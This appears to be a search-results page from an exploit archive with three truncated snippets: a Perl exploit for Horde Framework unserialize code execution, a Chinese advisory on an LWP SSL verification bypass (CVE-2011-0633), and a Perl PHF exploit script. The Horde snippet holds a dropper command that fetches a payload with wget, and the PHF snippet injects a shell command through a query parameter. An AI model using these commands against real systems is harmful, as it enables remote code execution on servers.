3 matches found
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...
Perl libwww-perl (LWP)模块SSL证书验证安全策略绕过漏洞
BUGTRAQ ID: 47895 CVE ID: CVE-2011-0633 CPAN(Comprehensive Perl Archive Network)中译为“Perl综合典藏网”,“Perl综合档案网”或者“Perl程序库”。它包含了极多用Perl写成的软件和其文件。 Perl libwww-perl LWP模块在SSL证书验证上存在安全策略绕过漏洞,远程攻击者可利用此漏洞执行中间人攻击或伪造受信任服务器。 libwww-perl LWP 6.00之前版本中的Net::HTTPS模块(也使用在其他产品中,如WWW::Mechanize,...
New Twist On The Old PHF Vulnerability
!/usr/bin/perl greets to josh arielle matt carley use WWW::Mechanize; if scalar@ARGV newtimeout = 3; print "Connecting...\n"; print "Checking if exploitable...\n"; $scrape-get"http://@ARGV0/cgi-bin/phf?Qalias=%0Auname%20-a"; $unamea = $scrape-content; @unameafeed = split/\n/, $unamea; for...